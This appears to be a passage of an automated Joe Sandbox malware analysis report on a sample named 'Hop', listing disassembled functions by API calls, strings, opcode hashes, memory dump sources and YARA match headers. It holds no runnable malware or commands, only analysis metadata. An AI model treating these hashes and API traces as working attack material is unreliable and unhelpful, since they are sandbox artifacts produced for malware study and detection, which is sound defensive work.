                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ed4cd48db317d028437d79ed32fdbf2d4d468542dcded9a22e892753fecea579
                                                                                                                                                                                                                                                                                                          • Instruction ID: fbf5f039e364421a44d92ed3189280c0b49ddd0d06f7d38514d3548e598fa2cd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed4cd48db317d028437d79ed32fdbf2d4d468542dcded9a22e892753fecea579
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D001B131F18791C2E7108B25B808729BBA0BF85BA8F191138EF5943BA1CF7DE490CB00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: gfffffff
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-1523873471
                                                                                                                                                                                                                                                                                                          • Opcode ID: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0f1f04f70f9fcc9c4f0dfd14517c0936e9d1eb73e9a648f566a1c5befbfc6aaa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A913863B09B86C6FB218F29D5407A86B65BF15BD8F048139CB8D47399DE3DE141C301
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • OleSetContainedObject.OLE32(?,?,?,?,?,?,?,?,?,00007FF68C4A27FF), ref: 00007FF68C4A2538
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ContainedObject
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                                                                                                          • API String ID: 3565006973-3941886329
                                                                                                                                                                                                                                                                                                          • Opcode ID: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 43884f5aacf157637ec4cecf7069bef28505f9d29e1902f47cf0a502aa9170da
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68912376604B46C2DB24CF29E4546AD73A4FB88B98F51803ADF8D83764EF39D899C700
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: e+000$gfff
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2767a0d0e97e014f78b8aaf544987c3be6863eeb933f837e63ac3689098b5ba3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC511862B1CBC186F7258F3599417696A91FF80B98F089239C79887ADACE2ED485C701
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                                                                                          • API String ID: 3467290483-2160076837
                                                                                                                                                                                                                                                                                                          • Opcode ID: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                                                                                                                                                                                                                                                                                                          • Instruction ID: c5b2244792acd65d41c99bf2f4f466de15316025f105d4a3c166e5c9a58871bd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D441FB325086C2CAD670DF25E4407AAB7A1FB84794F504239EBA943A99EF7CD481DB40
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                                                                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                                                                                                                                                          • API String ID: 3988819677-2584243854
                                                                                                                                                                                                                                                                                                          • Opcode ID: 32885857382379a4b4f2003679ad0bf2db11e685a1a76c32f342b704b352f53d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0801c31582d0289ece67ee5d62b47152d9e3d42db8b462d5bbdd00ceb9e1d7a0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32885857382379a4b4f2003679ad0bf2db11e685a1a76c32f342b704b352f53d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99312976B08B42D5EB10DB61E4506EC2761FF85B88F50403ADA0E97B9ADF38E59AC700
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CreateMessageObjectSendStock
                                                                                                                                                                                                                                                                                                          • String ID: $SysTabControl32
                                                                                                                                                                                                                                                                                                          • API String ID: 2080134422-3143400907
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                                                                                                                                                                                                                                                                                                          • Instruction ID: 219a152ab9e1e0badfaf13c6edc1a2cd98d133151cd9bf90cba5f9cf6378c1b6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8313B725097C1CAE760CF25A44475AB7A0F784BB4F144339EAA957AD8CB3DD495CF00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileHandleType
                                                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                                                          • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3c9b01793386ecdf54a50760fef14870e12fb4074ce8f9b7189c5b97aa28674d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60214F22A0CA82C1FB648B3594945392A51FF45B78F291339D76E877DCCE3AD8C1D381
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                                          • Opcode ID: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
                                                                                                                                                                                                                                                                                                          • Instruction ID: cc086e1e61bde78b5d5d2d145fe93061c445963873bac6eb6a7d1e264c58b4a9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37311936A08785CBD724CF29E444B5AB7A5FB88790F104239EB9943B99CF78E451CF00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                          • String ID: Combobox
                                                                                                                                                                                                                                                                                                          • API String ID: 1025951953-2096851135
                                                                                                                                                                                                                                                                                                          • Opcode ID: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
                                                                                                                                                                                                                                                                                                          • Instruction ID: ee5b0e94cbc378bce347616299f28f39f24d55ec46d19c245845dbe4583594a0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60310B32609781CAE770DF24A440B5AB7A1FB857A4F544239EAA943B99CF3DD981CF40
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                                                                                                                                          • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
                                                                                                                                                                                                                                                                                                          • Instruction ID: 76eb3282d25e9cce24c52062f1c954467da16c6c51587405565af8946027d72a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94311E359087C1CAE760DB15A45475A77A1FB887A4F144239EAAC43B99DF3CD881CF01
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _handle_error
                                                                                                                                                                                                                                                                                                          • String ID: "$pow
                                                                                                                                                                                                                                                                                                          • API String ID: 1757819995-713443511
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3c576607d4b91a008813b7ba888ff2fd0b2a07f091fd4f2eaec28f82da5ebe80
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7821EB72D1CA85C6F360CF10E444A6AAAA0FFDA348F201329E7CA46958DBBDD185DB00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3712363035-3916222277
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                                                                                                                                                          • String ID: !$tan
                                                                                                                                                                                                                                                                                                          • API String ID: 3384550415-2428968949
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                                                                                                                                                          • String ID: !$sin
                                                                                                                                                                                                                                                                                                          • API String ID: 3384550415-1565623160
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                                                                                                                                                          • String ID: !$cos
                                                                                                                                                                                                                                                                                                          • API String ID: 3384550415-1949035351
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _handle_error
                                                                                                                                                                                                                                                                                                          • String ID: "$exp
                                                                                                                                                                                                                                                                                                          • API String ID: 1757819995-2878093337
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • try_get_function.LIBVCRUNTIME ref: 00007FF68C457479
                                                                                                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(?,?,?,00007FF68C4570D1,?,?,?,?,00007FF68C45649C,?,?,?,?,00007FF68C454B1B), ref: 00007FF68C457490
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Valuetry_get_function
                                                                                                                                                                                                                                                                                                          • String ID: FlsSetValue
                                                                                                                                                                                                                                                                                                          • API String ID: 738293619-3750699315
                                                                                                                                                                                                                                                                                                          • Opcode ID: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                                                                                                                                                                                                                                                                                                          • Instruction ID: f398c3739c023a2cd6051527a9fe00292202ea138d5c2c889a93bd815ebff249
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5E065A1E18902C2EA15CB96E4004F93261BF487A8F59413DDA1D873D5CE7CE8D4C350
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF68C455471
                                                                                                                                                                                                                                                                                                          • _CxxThrowException.LIBVCRUNTIME ref: 00007FF68C455482
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C456EA8: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68C455487), ref: 00007FF68C456F1D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C456EA8: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF68C455487), ref: 00007FF68C456F4F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                          • API String ID: 3561508498-410509341
                                                                                                                                                                                                                                                                                                          • Opcode ID: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                                                                                                                                                                                                                                                                                                          • Instruction ID: c27fb5380e339c275c38aaff4e325fb8d2a0cb48883f0b25a7783c3432939d58
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16D06762A19A86D5DF10EB04D8953A96371FF94318F94443AE14DC25B5DF6CDA8AC700

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:10.1%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                          Signature Coverage:21.8%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:156
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:10

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Information$Query$CloseHandleSystem$ProcessToken
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2024103940-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c3f3c76c8b2be0d7d44dc3ee33c48ea8b0372aa6c5604e5390e5033e47f04c12
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7f5432ae089376d545c0bb39bc769949c1f67937a1240733ef525327dee971b4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3f3c76c8b2be0d7d44dc3ee33c48ea8b0372aa6c5604e5390e5033e47f04c12
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B371FA30318B069FEF54EB65985A76E73DAFBA47C0F410029E647C3191EE34D9018B8A

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationQuery$System$Processmalloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1267391693-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0766fc6635dd31053b727816442fefa633829422fb4b59d36c68c8cec887e78a
                                                                                                                                                                                                                                                                                                          • Instruction ID: b60532c730a992fec56e56249714280365557339cf9f0a7311772b69e71c6f71
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0766fc6635dd31053b727816442fefa633829422fb4b59d36c68c8cec887e78a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3331A871708A096FEF58F76C9C5A77D32CEE7A5751F010029DA4AC3192EE24DD02868E

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
